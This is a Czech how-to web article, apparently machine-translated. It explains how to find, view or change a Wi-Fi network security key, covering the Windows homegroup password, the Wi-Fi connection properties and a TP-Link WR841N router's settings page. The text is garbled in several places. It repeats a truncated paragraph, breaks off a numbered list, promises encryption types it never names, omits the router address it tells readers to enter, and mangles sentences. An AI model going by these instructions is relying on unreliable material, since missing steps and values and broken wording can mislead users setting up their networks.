    Než zadáte síťový klíč Rostelecom do nastavení zařízení nebo jej jen zjistíte, musíte určit IP adresu routeru. To vám umožní přístup k nastavení zařízení a specifikaci kombinace zabezpečení pro přístupový bod.

    Jak najít klíč zabezpečení sítě?

    Ne nadarmo zaměstnanci Microsoftu věnují velkou pozornost zabezpečení sítě. Jimi přijatá opatření umožňují majitelům nainstalovaných Windows nebát se, že jejich data zneužijí vetřelci. Sami uživatelé mohou pouze uložit hesla automaticky vytvořená během konfigurace a nepřenášet je cizím osobám. Zároveň je možné zjistit bezpečnostní klíč sítě v případě jeho ztráty.

    domácí skupina

    Heslo domácí skupiny je vyžadováno k ochraně vaší sítě před neoprávněným připojením z jiných počítačů. Je automaticky vygenerován a poskytnut uživateli po vytvoření samotné domácí skupiny. Algoritmus pro obnovu ztraceného kódu vypadá takto:

    1. stiskněte tlačítko "Start";
    2. klikněte na odkaz "Ovládací panely";
    3. v okně, které se otevře, vyberte položku "Síť a internet";
    4. klikněte na nápis "Centrum sítí a sdílení";

    Zobrazený kód by měl být zapsán a použit k připojení jiného počítače k ​​této domácí skupině.

    Pokud v oblasti systémová upozornění plocha (pravý dolní roh) je nakonfigurována pro zobrazení ikony připojení, bude ještě snazší najít klíč zabezpečení sítě. Pro tohle:

    1. klikněte pravým tlačítkem na ikonu připojení (v závislosti na nainstalované téma může vypadat jinak)
    2. vyberte "Centrum sítí a sdílení";
    3. zde klikněte na odkaz domácí skupina" (levý dolní roh);
    4. v novém okně vyberte položku „Zobrazit nebo vytisknout heslo pro domácí skupinu“.

      5. Klíč zabezpečení sítě je heslo, které můžete použít k připojení k fungující síti Wi-Fi. Bezpečné fungování bezdrátové sítě na tom přímo závisí. Jeho hlavním úkolem...

      Klíč zabezpečení sítě je heslo, které můžete použít k připojení k fungující síti Wi-Fi. Bezpečné fungování bezdrátové sítě na tom přímo závisí. Jeho hlavním úkolem...

    Bezdrátová síť je velmi rychlá a pohodlný způsob připojení k internetu, vytváření síťových skupin, přenos dat a mnoho dalších užitečných funkcí, které každý majitel PC nebo mobilního gadgetu používá každý den.

    Hlavní typy bezdrátových sítí:

    1) První typ Wi-Fi – s „otevřeným“ přístupem (nejoblíbenější a všemi milovaný)

    2) Druhý s "zavřeným"

    (spolehlivější a obvykle s nejlepší rychlost kvůli malému počtu připojených zařízení). Vyžaduje to ale bezpečnostní klíč Wi-Fi sítě, který získáte od správce sítě.

    Na PC se Wi-Fi bez hesla zobrazuje jako antény.

    Na mobilní zařízení otevřená síť nemá další ikony, na rozdíl od uzavřené sítě, kde je vedle ní umístěn obrázek zámku.

    U sítě bez hesla je to jasné: vybrali jste, připojili se a vše funguje, stává se, že potřebujete projít autorizací podle telefonního čísla, ale to je trochu mimo téma. Co dělat s uzavřenými přístupovými body, kde najít heslo? Nejprve musíte pochopit, co je klíč zabezpečení sítě, jak funguje a proč je potřeba.

    Klíč nebo heslo je určitá jedinečná sada znaků nastavená uživatelem podle vlastního uvážení, která se používá pro přístup k síti a také pro šifrování dat, která jsou v ní přenášena. Hlavním úkolem klíče je zvýšení bezpečnosti sítě.

    Data jsou šifrována pomocí následujících technologií:

    o Nastavením daný typšifrování, uživatel bude muset zadat bezpečnostní kód, router zkontroluje zadaná data a udělí přístup do sítě, případně označí nesprávné heslo.

    Ó Tenhle typ Ochrana sítě je zastaralá, ale stále se používá kvůli specifickému druhu zařízení, která ji podporují. Technologie je méně bezpečná a snadno hacknutelná, použití se nedoporučuje.

    Nastavení hesla na routeru.

    Například router TP-Link WR841N / WR841ND zvažují, jak zjistit bezpečnostní klíč bezdrátové sítě, jak na něj nahlížet, jak jej změnit nebo úplně odstranit.

    Chcete-li se dostat do nabídky nastavení routeru, vložte síťový drát do portu routeru a síťová karta PC a do adresního řádku zadejte následující hodnotu:

    Do polí přihlašovací jméno a heslo zadejte admin, poté musíte kliknout na přihlášení.

    Zvýrazněné pole bude obsahovat vaše heslo, které lze vždy změnit zadáním údajů splňujících níže uvedené podmínky. Jakákoli změna na routeru v nastavení se potvrdí stisknutím tlačítka "Uložit". Klíč může změnit uživatel, který má přístup do nabídky nastavení routeru.

    Výše popsaná metoda ukazuje, jak změnit heslo, typ šifrování nebo jen číst data. Pokud je potřeba v počítači najít bezpečnostní klíč, je to možné z nabídky „Vlastnosti“ dostupného připojení.

    Chcete-li klíč zobrazit, měli byste zaškrtnout políčko „Zobrazit vstupní znaky“.

    Hodnotu hesla v tomto okně nelze změnit. Slouží pouze k zobrazení zadaného kódu při prvním "spojení".

    Při připojení k nová síť, otevře se následující okno:

    V případě složité kombinace znaků můžete heslo zkopírovat a vložit do pole klíče (pokud je k dispozici v textový formát), z důvodu zachování důvěrnosti se zaškrtnutím políčka „Skrýt symboly“ zobrazí heslo s hvězdičkami a poté klikněte na OK. Pokud se kód ukáže jako nesprávný, zkuste to znovu, ale zadejte heslo ručně a pečlivě sledujte pořadí znaků a znaků.

    Abyste pochopili, jak můžete zjistit klíč zabezpečení sítě na mobilní telefon, musíte mít pokročilá práva ke konfiguraci gadgetu nebo používat specializované programy jejich stažením z internetu.

    Pokud jste správcem své sítě, nebo máte doma jen nainstalovaný bezdrátový router, tak zkuste omezit cizinci abyste se nemohli dostat do vaší sítě, vymýšlejte složité kombinace hesel. A jak zjistit heslo k novému routeru, který jste si právě koupili? Stačí jej připojit k počítači pomocí síťového kabelu a přejít do nabídky „Nastavení“, jak je znázorněno na obrázku „Nabídka nastavení“ výše.

    Související videa

    Rychlý internet pro vás!

    Přečtěte si více: